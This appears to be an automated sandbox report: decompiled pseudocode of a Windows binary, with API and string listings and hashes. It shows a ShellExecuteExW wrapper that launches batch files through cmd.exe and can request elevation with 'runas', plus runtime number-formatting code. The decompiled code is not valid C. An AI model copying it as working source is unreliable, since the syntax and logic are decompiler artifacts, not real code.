                                                                                                						 *(_t135 - 0xc) = _t275;
                                                                                                						 *((short*)( *_t203 + _t275 * 2)) = 0;
                                                                                                						E00F75AA0(_t203, _t287 - 0x20, _t275, _t281, _t203);
                                                                                                						 *(_t287 - 4) = 4;
                                                                                                						_t206 = _t203 | 0xffffffff;
                                                                                                						_t254 =  *((intOrPtr*)(_t287 - 0x2c)) + 0xfffffff0;
                                                                                                						asm("lock xadd [edx+0xc], eax");
                                                                                                						if(_t206 - 1 <= 0) {
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t254)) + 4))(_t254);
                                                                                                						}
                                                                                                						if( *((char*)(_t287 - 0xd)) != 0) {
                                                                                                							_t187 =  *(_t287 - 0x20);
                                                                                                							_t270 = L".bat";
                                                                                                							_t246 = _t187;
                                                                                                							while(1) {
                                                                                                								_t279 =  *_t246;
                                                                                                								if(_t279 !=  *_t270) {
                                                                                                									break;
                                                                                                								}
                                                                                                								if(_t279 == 0) {
                                                                                                									L12:
                                                                                                									_t247 = 0;
                                                                                                								} else {
                                                                                                									_t279 =  *((intOrPtr*)(_t246 + 2));
                                                                                                									if(_t279 !=  *((intOrPtr*)(_t270 + 2))) {
                                                                                                										break;
                                                                                                									} else {
                                                                                                										_t246 = _t246 + 4;
                                                                                                										_t270 = _t270 + 4;
                                                                                                										if(_t279 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L12;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								L14:
                                                                                                								if(_t247 == 0) {
                                                                                                									L23:
                                                                                                									GetWindowsDirectoryW(_t287, 0x104);
                                                                                                									_push(_t287);
                                                                                                									_push(L"%s\\System32\\cmd.exe");
                                                                                                									_push(_t287 - 0x18);
                                                                                                									E00F75B50(_t287 - 0x18, _t206, _t279, _t281);
                                                                                                									_push( *((intOrPtr*)( *((intOrPtr*)(_t287 - 0x1c)))));
                                                                                                									_push( *((intOrPtr*)( *((intOrPtr*)(_t287 - 0x30)))));
                                                                                                									_push(L"/C \"\"%s\" %s\"");
                                                                                                									_push(_t287 - 0x14);
                                                                                                									E00F75B50(_t287 - 0x14, _t206, _t279, _t281);
                                                                                                									_t292 = _t292 + 0x1c;
                                                                                                								} else {
                                                                                                									_t248 = L".cmd";
                                                                                                									while(1) {
                                                                                                										_t271 =  *_t187;
                                                                                                										if(_t271 !=  *_t248) {
                                                                                                											break;
                                                                                                										}
                                                                                                										if(_t271 == 0) {
                                                                                                											L20:
                                                                                                											_t197 = 0;
                                                                                                										} else {
                                                                                                											_t272 =  *((intOrPtr*)(_t187 + 2));
                                                                                                											if(_t272 !=  *((intOrPtr*)(_t248 + 2))) {
                                                                                                												break;
                                                                                                											} else {
                                                                                                												_t187 = _t187 + 4;
                                                                                                												_t248 = _t248 + 4;
                                                                                                												if(_t272 != 0) {
                                                                                                													continue;
                                                                                                												} else {
                                                                                                													goto L20;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                										L22:
                                                                                                										if(_t197 == 0) {
                                                                                                											goto L23;
                                                                                                										}
                                                                                                										goto L24;
                                                                                                									}
                                                                                                									asm("sbb eax, eax");
                                                                                                									_t197 = _t187 | 0x00000001;
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								goto L24;
                                                                                                							}
                                                                                                							asm("sbb ecx, ecx");
                                                                                                							_t247 = _t246 | 0x00000001;
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						L24:
                                                                                                						_t255 =  *((intOrPtr*)(_t287 - 0x18));
                                                                                                						 *((intOrPtr*)(_t287 - 0x60)) =  *((intOrPtr*)(_t287 - 0x18));
                                                                                                						 *(_t287 - 0x54) = 0 | _t287[0x10c] != 0x00000000;
                                                                                                						_t143 =  ==  ? L"open" : L"runas";
                                                                                                						 *(_t287 - 0x64) =  ==  ? L"open" : L"runas";
                                                                                                						_t222 =  *( *(_t287 - 0x34));
                                                                                                						_t145 =  !=  ? _t222 :  *((intOrPtr*)(_t287 - 0x58));
                                                                                                						 *((intOrPtr*)(_t287 - 0x58)) =  !=  ? _t222 :  *((intOrPtr*)(_t287 - 0x58));
                                                                                                						_t146 =  *((intOrPtr*)(_t287 - 0x14));
                                                                                                						_t224 =  !=  ? _t146 :  *((intOrPtr*)(_t287 - 0x5c));
                                                                                                						 *((intOrPtr*)(_t287 - 0x5c)) =  !=  ? _t146 :  *((intOrPtr*)(_t287 - 0x5c));
                                                                                                						if( *((char*)(_t287 - 0xd)) != 0) {
                                                                                                							_t186 = GetForegroundWindow();
                                                                                                							_t255 =  *((intOrPtr*)(_t287 - 0x60));
                                                                                                							 *(_t287 - 0x68) = _t186;
                                                                                                						}
                                                                                                						if(_t281 != 0) {
                                                                                                							while( *_t281 != 0) {
                                                                                                								_t281 = _t281 + 2;
                                                                                                							}
                                                                                                							_t177 = 0x53;
                                                                                                							_t236 = L"ShellExecuteInfo members:" - _t281;
                                                                                                							asm("o16 nop [eax+eax]");
                                                                                                							do {
                                                                                                								 *_t281 = _t177;
                                                                                                								_t281 = _t281 + 2;
                                                                                                								_t177 =  *(_t281 + _t236) & 0x0000ffff;
                                                                                                							} while (_t177 != 0);
                                                                                                							 *_t281 = 0;
                                                                                                							_t179 = 0xd;
                                                                                                							do {
                                                                                                								 *_t281 = _t179;
                                                                                                								_t281 = _t281 + 2;
                                                                                                								_t179 =  *(_t281 + 0xfc75cc) & 0x0000ffff;
                                                                                                							} while (_t179 != 0);
                                                                                                							 *_t281 = 0;
                                                                                                							_t184 = E00F76CD0(E00F76CD0(E00F76CD0(E00F76CD0(_t281, L"FilePath:<", _t255, ">"), L"Verb:<",  *(_t287 - 0x64), ">"), L"Directory:<",  *((intOrPtr*)(_t287 - 0x58)), ">"), L"Parameters:<",  *((intOrPtr*)(_t287 - 0x5c)), ">");
                                                                                                							_t244 =  !=  ? L"Hidden" : L"Visible";
                                                                                                							_t281 = E00F76CD0(_t184, L"Window Visibility:",  !=  ? L"Hidden" : L"Visible", 0);
                                                                                                						}
                                                                                                						_t276 = ShellExecuteExW(_t287 - 0x70);
                                                                                                						if(_t281 != 0) {
                                                                                                							_t281 = E00F758E0(_t276, _t281);
                                                                                                						}
                                                                                                						if(_t276 == 0) {
                                                                                                							_t172 =  *((intOrPtr*)(_t287 - 0x50));
                                                                                                							if(_t172 == 0x1f || _t172 == 0x1b) {
                                                                                                								 *(_t287 - 0x6c) =  *(_t287 - 0x6c) & 0xfffffbff;
                                                                                                								 *(_t287 - 0x64) = 0;
                                                                                                								_t174 = ShellExecuteExW(_t287 - 0x70);
                                                                                                								if(_t281 != 0) {
                                                                                                									E00F758E0(_t174, _t281);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_t282 =  *(_t287 - 0x24);
                                                                                                						if(_t282 == 0) {
                                                                                                							if(_t287[0x10c] == 2) {
                                                                                                								_t284 =  *(_t287 - 0x38);
                                                                                                								_t162 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "GetProcessId");
                                                                                                								if(_t162 != 0) {
                                                                                                									_t278 =  *_t162(_t284);
                                                                                                									CloseHandle(_t284);
                                                                                                									_t209 = Sleep;
                                                                                                									_t232 = 0;
                                                                                                									_t285 = 0;
                                                                                                									while(_t285 < 0x14) {
                                                                                                										Sleep(0x64);
                                                                                                										 *(_t287 - 0x28) = _t278;
                                                                                                										 *(_t287 - 0x24) = 0;
                                                                                                										EnumWindows(0xf75880, _t287 - 0x28);
                                                                                                										_t232 =  *(_t287 - 0x24);
                                                                                                										_t285 = _t285 + 1;
                                                                                                										if(_t232 == 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											L51:
                                                                                                											BringWindowToTop(_t232);
                                                                                                										}
                                                                                                										L52:
                                                                                                										_t206 = _t209 | 0xffffffff;
                                                                                                										goto L53;
                                                                                                									}
                                                                                                									if(_t232 != 0) {
                                                                                                										goto L51;
                                                                                                									}
                                                                                                									goto L52;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t168 =  *(_t287 - 0x38);
                                                                                                							 *_t282 = 0xffffffff;
                                                                                                							if(_t168 != 0) {
                                                                                                								WaitForSingleObject(_t168, 0xffffffff);
                                                                                                								GetExitCodeProcess( *(_t287 - 0x38), _t282);
                                                                                                								CloseHandle( *(_t287 - 0x38));
                                                                                                							}
                                                                                                						}
                                                                                                						L53:
                                                                                                						 *(_t287 - 4) = 1;
                                                                                                						_t257 =  *(_t287 - 0x20) + 0xfffffff0;
                                                                                                						asm("lock xadd [edx+0xc], eax");
                                                                                                						if(_t206 - 1 <= 0) {
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t257)) + 4))(_t257);
                                                                                                						}
                                                                                                						 *(_t287 - 4) = 0;
                                                                                                						_t259 =  *((intOrPtr*)(_t287 - 0x14)) + 0xfffffff0;
                                                                                                						asm("lock xadd [edx+0xc], eax");
                                                                                                						if(_t206 - 1 <= 0) {
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t259)) + 4))(_t259);
                                                                                                						}
                                                                                                						 *(_t287 - 4) = 0xffffffff;
                                                                                                						_t261 =  *((intOrPtr*)(_t287 - 0x18)) + 0xfffffff0;
                                                                                                						asm("lock xadd [edx+0xc], ebx");
                                                                                                						if(_t206 - 1 <= 0) {
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t261)) + 4))(_t261);
                                                                                                						}
                                                                                                						 *[fs:0x0] =  *((intOrPtr*)(_t287 - 0xc));
                                                                                                						return E00F80D7F(_t287[0x104] ^ _t287, _t261);
                                                                                                					}
                                                                                                				}
                                                                                                			}



















































                                                                                                0x00f75361
                                                                                                0x00f7536e
                                                                                                0x00f75370
                                                                                                0x00f7537b
                                                                                                0x00f7537f
                                                                                                0x00f75384
                                                                                                0x00f75386
                                                                                                0x00f7538d
                                                                                                0x00f7538e
                                                                                                0x00f7538f
                                                                                                0x00f75393
                                                                                                0x00f75399
                                                                                                0x00f7539c
                                                                                                0x00f7539e
                                                                                                0x00f753a7
                                                                                                0x00f753ad
                                                                                                0x00f753b3
                                                                                                0x00f753be
                                                                                                0x00f753c7
                                                                                                0x00f753ca
                                                                                                0x00f753cf
                                                                                                0x00f753d2
                                                                                                0x00f753e5
                                                                                                0x00f753ec
                                                                                                0x00f753ef
                                                                                                0x00f753f4
                                                                                                0x00f753fb
                                                                                                0x00f75401
                                                                                                0x00f75406
                                                                                                0x00f7540d
                                                                                                0x00f75416
                                                                                                0x00f75418
                                                                                                0x00f7541c
                                                                                                0x00f7541e
                                                                                                0x00f75423
                                                                                                0x00f757fa
                                                                                                0x00f757fa
                                                                                                0x00f757ff
                                                                                                0x00f75804
                                                                                                0x00f75805
                                                                                                0x00f75806
                                                                                                0x00f75807
                                                                                                0x00f75808
                                                                                                0x00f75809
                                                                                                0x00f7580a
                                                                                                0x00f7580b
                                                                                                0x00f7580c
                                                                                                0x00f7580d
                                                                                                0x00f7580e
                                                                                                0x00f7580f
                                                                                                0x00f75810
                                                                                                0x00f75816
                                                                                                0x00f7582f
                                                                                                0x00f75837
                                                                                                0x00f7583c
                                                                                                0x00f7584b
                                                                                                0x00f7585a
                                                                                                0x00f7585c
                                                                                                0x00f75864
                                                                                                0x00f7586b
                                                                                                0x00f7586b
                                                                                                0x00f75872
                                                                                                0x00f7587e
                                                                                                0x00f75831
                                                                                                0x00f75836
                                                                                                0x00f75836
                                                                                                0x00f75429
                                                                                                0x00f75438
                                                                                                0x00f7543d
                                                                                                0x00f75442
                                                                                                0x00f75442
                                                                                                0x00f75449
                                                                                                0x00f7544e
                                                                                                0x00f75450
                                                                                                0x00f75456
                                                                                                0x00000000
                                                                                                0x00f7545c
                                                                                                0x00f7545c
                                                                                                0x00f75464
                                                                                                0x00f7546b
                                                                                                0x00f75470
                                                                                                0x00f75474
                                                                                                0x00f7547c
                                                                                                0x00f7547f
                                                                                                0x00f75487
                                                                                                0x00f7548e
                                                                                                0x00f7548e
                                                                                                0x00f75495
                                                                                                0x00f7549b
                                                                                                0x00f7549e
                                                                                                0x00f754a3
                                                                                                0x00f754a5
                                                                                                0x00f754a5
                                                                                                0x00f754ab
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f754b0
                                                                                                0x00f754c7
                                                                                                0x00f754c7
                                                                                                0x00f754b2
                                                                                                0x00f754b2
                                                                                                0x00f754ba
                                                                                                0x00000000
                                                                                                0x00f754bc
                                                                                                0x00f754bc
                                                                                                0x00f754bf
                                                                                                0x00f754c5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f754c5
                                                                                                0x00f754ba
                                                                                                0x00f754d0
                                                                                                0x00f754d2
                                                                                                0x00f7550f
                                                                                                0x00f75518
                                                                                                0x00f75521
                                                                                                0x00f75525
                                                                                                0x00f7552a
                                                                                                0x00f7552b
                                                                                                0x00f75533
                                                                                                0x00f75538
                                                                                                0x00f7553d
                                                                                                0x00f75542
                                                                                                0x00f75543
                                                                                                0x00f75548
                                                                                                0x00f754d4
                                                                                                0x00f754d4
                                                                                                0x00f754e0
                                                                                                0x00f754e0
                                                                                                0x00f754e6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f754eb
                                                                                                0x00f75502
                                                                                                0x00f75502
                                                                                                0x00f754ed
                                                                                                0x00f754ed
                                                                                                0x00f754f5
                                                                                                0x00000000
                                                                                                0x00f754f7
                                                                                                0x00f754f7
                                                                                                0x00f754fa
                                                                                                0x00f75500
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f75500
                                                                                                0x00f754f5
                                                                                                0x00f7550b
                                                                                                0x00f7550d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7550d
                                                                                                0x00f75506
                                                                                                0x00f75508
                                                                                                0x00000000
                                                                                                0x00f75508
                                                                                                0x00000000
                                                                                                0x00f754d2
                                                                                                0x00f754cb
                                                                                                0x00f754cd
                                                                                                0x00000000
                                                                                                0x00f754cd
                                                                                                0x00f7554b
                                                                                                0x00f7554b
                                                                                                0x00f7555b
                                                                                                0x00f75565
                                                                                                0x00f7556d
                                                                                                0x00f75573
                                                                                                0x00f75579
                                                                                                0x00f7557f
                                                                                                0x00f75585
                                                                                                0x00f75588
                                                                                                0x00f7558f
                                                                                                0x00f75596
                                                                                                0x00f75599
                                                                                                0x00f7559b
                                                                                                0x00f755a1
                                                                                                0x00f755a4
                                                                                                0x00f755a4
                                                                                                0x00f755a9
                                                                                                0x00f755b3
                                                                                                0x00f755b5
                                                                                                0x00f755b8
                                                                                                0x00f755c3
                                                                                                0x00f755c8
                                                                                                0x00f755ca
                                                                                                0x00f755d0
                                                                                                0x00f755d0
                                                                                                0x00f755d3
                                                                                                0x00f755d6
                                                                                                0x00f755da
                                                                                                0x00f755e6
                                                                                                0x00f755eb
                                                                                                0x00f755f0
                                                                                                0x00f755f0
                                                                                                0x00f755f3
                                                                                                0x00f755f6
                                                                                                0x00f755fa
                                                                                                0x00f7560e
                                                                                                0x00f7564d
                                                                                                0x00f75660
                                                                                                0x00f75675
                                                                                                0x00f75675
                                                                                                0x00f75681
                                                                                                0x00f75685
                                                                                                0x00f75690
                                                                                                0x00f75690
                                                                                                0x00f75694
                                                                                                0x00f75696
                                                                                                0x00f7569c
                                                                                                0x00f756a3
                                                                                                0x00f756ae
                                                                                                0x00f756b5
                                                                                                0x00f756bd
                                                                                                0x00f756c3
                                                                                                0x00f756c3
                                                                                                0x00f756bd
                                                                                                0x00f7569c
                                                                                                0x00f756c8
                                                                                                0x00f756cd
                                                                                                0x00f75705
                                                                                                0x00f75707
                                                                                                0x00f7571b
                                                                                                0x00f75723
                                                                                                0x00f75729
                                                                                                0x00f7572b
                                                                                                0x00f75731
                                                                                                0x00f75737
                                                                                                0x00f75739
                                                                                                0x00f75740
                                                                                                0x00f75747
                                                                                                0x00f7574c
                                                                                                0x00f75755
                                                                                                0x00f7575c
                                                                                                0x00f75762
                                                                                                0x00f75765
                                                                                                0x00f75768
                                                                                                0x00000000
                                                                                                0x00f7576a
                                                                                                0x00f75770
                                                                                                0x00f75771
                                                                                                0x00f75771
                                                                                                0x00f75777
                                                                                                0x00f75777
                                                                                                0x00000000
                                                                                                0x00f75777
                                                                                                0x00f7576e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7576e
                                                                                                0x00f75723
                                                                                                0x00f756cf
                                                                                                0x00f756cf
                                                                                                0x00f756d2
                                                                                                0x00f756da
                                                                                                0x00f756e3
                                                                                                0x00f756ed
                                                                                                0x00f756f6
                                                                                                0x00f756f6
                                                                                                0x00f756da
                                                                                                0x00f7577a
                                                                                                0x00f7577a
                                                                                                0x00f75783
                                                                                                0x00f75786
                                                                                                0x00f7578e
                                                                                                0x00f75795
                                                                                                0x00f75795
                                                                                                0x00f75798
                                                                                                0x00f757a1
                                                                                                0x00f757a4
                                                                                                0x00f757ac
                                                                                                0x00f757b3
                                                                                                0x00f757b3
                                                                                                0x00f757b6
                                                                                                0x00f757c0
                                                                                                0x00f757c3
                                                                                                0x00f757cb
                                                                                                0x00f757d2
                                                                                                0x00f757d2
                                                                                                0x00f757da
                                                                                                0x00f757f9
                                                                                                0x00f757f9
                                                                                                0x00f75456

                                                                                                APIs
                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,00000000), ref: 00F75518
                                                                                                • GetForegroundWindow.USER32(00000000,?,?,00000000), ref: 00F7559B
                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00F7567B
                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00F756B5
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F756E3
                                                                                                • GetExitCodeProcess.KERNEL32 ref: 00F756ED
                                                                                                • CloseHandle.KERNEL32(?), ref: 00F756F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell$CloseCodeDirectoryExitForegroundHandleObjectProcessSingleWaitWindowWindows
                                                                                                • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                • API String ID: 3871407861-2796270252
                                                                                                • Opcode ID: c35454cd2a2486aff148e89435709605b9411953fdec5f1229dbff52e71c6792
                                                                                                • Instruction ID: ea92dbce7a2e17d099f7a287ae10f500da3c4db2eb3c91f9c3a847c148dcf028
                                                                                                • Opcode Fuzzy Hash: c35454cd2a2486aff148e89435709605b9411953fdec5f1229dbff52e71c6792
                                                                                                • Instruction Fuzzy Hash: 0FE1B331E00609DBDB14EFA8CC45BAEB7B5EF44720F54822EE809AB291EB749D01DF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 66%
                                                                                                			E00FAF2E8(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				signed int _v464;
                                                                                                				void _v468;
                                                                                                				signed int _v472;
                                                                                                				signed int _v932;
                                                                                                				signed int _v936;
                                                                                                				signed int _v1392;
                                                                                                				signed int _v1396;
                                                                                                				signed int _v1400;
                                                                                                				char _v1860;
                                                                                                				signed int _v1864;
                                                                                                				signed int _v1868;
                                                                                                				signed int _v1872;
                                                                                                				signed int _v1876;
                                                                                                				signed int _v1880;
                                                                                                				signed int _v1884;
                                                                                                				signed int _v1888;
                                                                                                				signed int _v1892;
                                                                                                				signed int _v1896;
                                                                                                				signed int _v1900;
                                                                                                				signed int _v1904;
                                                                                                				signed int _v1908;
                                                                                                				signed int _v1912;
                                                                                                				intOrPtr _v1916;
                                                                                                				signed int _v1920;
                                                                                                				intOrPtr* _v1924;
                                                                                                				signed int _v1928;
                                                                                                				char _v1936;
                                                                                                				signed int _v1944;
                                                                                                				char _v2404;
                                                                                                				signed int _v2408;
                                                                                                				signed int _t742;
                                                                                                				intOrPtr _t752;
                                                                                                				signed int _t756;
                                                                                                				signed int _t757;
                                                                                                				intOrPtr _t766;
                                                                                                				signed int _t767;
                                                                                                				signed char _t769;
                                                                                                				intOrPtr _t770;
                                                                                                				intOrPtr _t773;
                                                                                                				intOrPtr _t775;
                                                                                                				intOrPtr _t776;
                                                                                                				void* _t777;
                                                                                                				signed int _t781;
                                                                                                				signed int _t782;
                                                                                                				signed int _t788;
                                                                                                				intOrPtr _t795;
                                                                                                				void* _t796;
                                                                                                				unsigned int* _t798;
                                                                                                				signed int _t807;
                                                                                                				signed int _t812;
                                                                                                				signed int _t813;
                                                                                                				signed int _t814;
                                                                                                				signed int _t817;
                                                                                                				signed int _t818;
                                                                                                				signed int _t819;
                                                                                                				signed int _t821;
                                                                                                				signed int _t822;
                                                                                                				signed int _t823;
                                                                                                				signed int _t824;
                                                                                                				signed int _t829;
                                                                                                				signed int _t830;
                                                                                                				signed int _t836;
                                                                                                				signed int _t837;
                                                                                                				signed int _t840;
                                                                                                				signed int _t845;
                                                                                                				signed int _t853;
                                                                                                				signed int* _t856;
                                                                                                				signed int _t860;
                                                                                                				signed int _t871;
                                                                                                				signed int _t872;
                                                                                                				signed int _t873;
                                                                                                				signed int _t874;
                                                                                                				char* _t875;
                                                                                                				signed int _t878;
                                                                                                				signed int _t884;
                                                                                                				signed int _t886;
                                                                                                				signed int _t890;
                                                                                                				signed int _t893;
                                                                                                				signed int _t902;
                                                                                                				signed int _t905;
                                                                                                				signed int _t907;
                                                                                                				signed int _t910;
                                                                                                				signed int _t911;
                                                                                                				signed int _t914;
                                                                                                				signed int _t927;
                                                                                                				signed int _t928;
                                                                                                				signed int _t929;
                                                                                                				signed int _t930;
                                                                                                				char* _t931;
                                                                                                				signed int _t934;
                                                                                                				signed int* _t937;
                                                                                                				signed int _t940;
                                                                                                				signed int _t942;
                                                                                                				signed int _t946;
                                                                                                				signed int _t949;
                                                                                                				signed int _t957;
                                                                                                				signed int _t960;
                                                                                                				signed int _t964;
                                                                                                				intOrPtr _t968;
                                                                                                				void* _t969;
                                                                                                				unsigned int* _t971;
                                                                                                				unsigned int _t981;
                                                                                                				signed int _t982;
                                                                                                				void* _t985;
                                                                                                				signed int _t986;
                                                                                                				void* _t988;
                                                                                                				signed int _t1001;
                                                                                                				signed int _t1003;
                                                                                                				unsigned int _t1008;
                                                                                                				signed int _t1009;
                                                                                                				void* _t1012;
                                                                                                				signed int _t1013;
                                                                                                				void* _t1015;
                                                                                                				signed int _t1020;
                                                                                                				signed int _t1024;
                                                                                                				signed int _t1026;
                                                                                                				void* _t1033;
                                                                                                				signed int _t1034;
                                                                                                				signed int _t1036;
                                                                                                				signed int _t1039;
                                                                                                				void* _t1043;
                                                                                                				signed int _t1044;
                                                                                                				signed int _t1046;
                                                                                                				signed int _t1048;
                                                                                                				signed int _t1050;
                                                                                                				signed int _t1051;
                                                                                                				signed int _t1052;
                                                                                                				signed int _t1053;
                                                                                                				intOrPtr* _t1066;
                                                                                                				void* _t1071;
                                                                                                				signed int _t1077;
                                                                                                				signed int _t1078;
                                                                                                				signed int _t1081;
                                                                                                				signed int _t1082;
                                                                                                				signed int _t1084;
                                                                                                				signed int _t1085;
                                                                                                				signed int _t1086;
                                                                                                				signed int _t1090;
                                                                                                				signed int _t1094;
                                                                                                				signed int _t1095;
                                                                                                				signed int _t1096;
                                                                                                				signed int _t1098;
                                                                                                				signed int _t1099;
                                                                                                				signed int _t1100;
                                                                                                				signed int _t1101;
                                                                                                				signed int _t1102;
                                                                                                				signed int _t1103;
                                                                                                				signed int _t1104;
                                                                                                				signed int _t1106;
                                                                                                				signed int _t1107;
                                                                                                				signed int _t1108;
                                                                                                				signed int _t1109;
                                                                                                				signed int _t1110;
                                                                                                				void* _t1111;
                                                                                                				signed int _t1112;
                                                                                                				intOrPtr _t1116;
                                                                                                				signed int _t1117;
                                                                                                				signed int _t1118;
                                                                                                				signed int _t1123;
                                                                                                				void* _t1124;
                                                                                                				intOrPtr _t1127;
                                                                                                				signed int _t1128;
                                                                                                				signed int _t1131;
                                                                                                				signed int _t1136;
                                                                                                				signed int _t1140;
                                                                                                				signed int _t1141;
                                                                                                				unsigned int _t1142;
                                                                                                				signed int _t1151;
                                                                                                				signed int _t1153;
                                                                                                				unsigned int _t1155;
                                                                                                				signed int _t1160;
                                                                                                				intOrPtr* _t1162;
                                                                                                				signed int _t1164;
                                                                                                				intOrPtr* _t1166;
                                                                                                				void* _t1167;
                                                                                                				intOrPtr _t1168;
                                                                                                				void* _t1172;
                                                                                                				signed int _t1173;
                                                                                                				unsigned int _t1175;
                                                                                                				signed int _t1176;
                                                                                                				signed int _t1177;
                                                                                                				void* _t1178;
                                                                                                				signed int _t1179;
                                                                                                				signed int _t1180;
                                                                                                				signed int _t1181;
                                                                                                				signed int _t1184;
                                                                                                				signed int _t1185;
                                                                                                				signed int _t1186;
                                                                                                				signed int _t1187;
                                                                                                				signed int _t1190;
                                                                                                				signed int _t1191;
                                                                                                				signed int _t1192;
                                                                                                				signed int _t1193;
                                                                                                				signed int _t1195;
                                                                                                				signed int _t1198;
                                                                                                				signed int _t1199;
                                                                                                				signed int _t1202;
                                                                                                				void* _t1203;
                                                                                                				signed int _t1204;
                                                                                                				signed int _t1205;
                                                                                                				signed int _t1208;
                                                                                                				signed int _t1209;
                                                                                                				signed int _t1210;
                                                                                                				unsigned int* _t1211;
                                                                                                				signed int _t1212;
                                                                                                				signed int _t1215;
                                                                                                				signed int _t1216;
                                                                                                				signed int _t1217;
                                                                                                				signed int _t1218;
                                                                                                				signed int _t1220;
                                                                                                				signed int _t1221;
                                                                                                				signed int _t1222;
                                                                                                				signed int _t1223;
                                                                                                				signed int _t1224;
                                                                                                				signed int _t1226;
                                                                                                				signed int _t1227;
                                                                                                				signed int _t1228;
                                                                                                				signed int _t1229;
                                                                                                				signed int _t1230;
                                                                                                				unsigned int* _t1231;
                                                                                                				signed int _t1232;
                                                                                                				signed int _t1236;
                                                                                                				signed int _t1238;
                                                                                                				signed int _t1240;
                                                                                                				signed int _t1242;
                                                                                                				signed int _t1244;
                                                                                                				signed int _t1246;
                                                                                                				signed int* _t1247;
                                                                                                				signed int* _t1250;
                                                                                                				signed int _t1253;
                                                                                                				signed int _t1260;
                                                                                                
                                                                                                				_t1203 = __esi;
                                                                                                				_t1167 = __edi;
                                                                                                				_t1033 = __ebx;
                                                                                                				_t1244 = _t1246;
                                                                                                				_t1247 = _t1246 - 0x964;
                                                                                                				_t742 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_v8 = _t742 ^ _t1244;
                                                                                                				_v1924 = _a16;
                                                                                                				_v1904 = _a20;
                                                                                                				E00FB28CB(__eflags,  &_v1944);
                                                                                                				if((_v1944 & 0x0000001f) != 0x1f) {
                                                                                                					E00FB2935(__eflags,  &_v1944);
                                                                                                					_v1936 = 1;
                                                                                                				} else {
                                                                                                					_v1936 = 0;
                                                                                                				}
                                                                                                				_push(_t1033);
                                                                                                				_t1034 = _a4;
                                                                                                				_push(_t1203);
                                                                                                				_t1204 = _a8;
                                                                                                				_push(_t1167);
                                                                                                				_t1168 = 0x20;
                                                                                                				_t1253 = _t1204;
                                                                                                				if(_t1253 > 0 || _t1253 >= 0 && _t1034 >= 0) {
                                                                                                					_t752 = _t1168;
                                                                                                				} else {
                                                                                                					_t752 = 0x2d;
                                                                                                				}
                                                                                                				_t1066 = _v1924;
                                                                                                				_t1139 = _v1904;
                                                                                                				 *_t1066 = _t752;
                                                                                                				 *(_t1066 + 8) = _t1139;
                                                                                                				if((_t1204 & 0x7ff00000) != 0) {
                                                                                                					L11:
                                                                                                					_t756 = E00FA643D( &_a4);
                                                                                                					__eflags = _t756;
                                                                                                					if(_t756 != 0) {
                                                                                                						 *(_v1924 + 4) = 1;
                                                                                                					}
                                                                                                					_t757 = _t756 - 1;
                                                                                                					__eflags = _t757;
                                                                                                					if(_t757 == 0) {
                                                                                                						_push("1#INF");
                                                                                                						goto L310;
                                                                                                					} else {
                                                                                                						_t781 = _t757 - 1;
                                                                                                						__eflags = _t781;
                                                                                                						if(_t781 == 0) {
                                                                                                							_push("1#QNAN");
                                                                                                							goto L310;
                                                                                                						} else {
                                                                                                							_t782 = _t781 - 1;
                                                                                                							__eflags = _t782;
                                                                                                							if(_t782 == 0) {
                                                                                                								_push("1#SNAN");
                                                                                                								goto L310;
                                                                                                							} else {
                                                                                                								__eflags = _t782 == 1;
                                                                                                								if(_t782 == 1) {
                                                                                                									_push("1#IND");
                                                                                                									L310:
                                                                                                									_push(_a24);
                                                                                                									_t1070 = _v1904;
                                                                                                									_push(_v1904);
                                                                                                									goto L311;
                                                                                                								} else {
                                                                                                									_v1928 = _v1928 & 0x00000000;
                                                                                                									_a8 = _t1204 & 0x7fffffff;
                                                                                                									_a4 = _t1034;
                                                                                                									_t1260 = _a4;
                                                                                                									asm("fst qword [ebp-0x778]");
                                                                                                									_t1208 = _v1912;
                                                                                                									_v1920 = _a12 + 1;
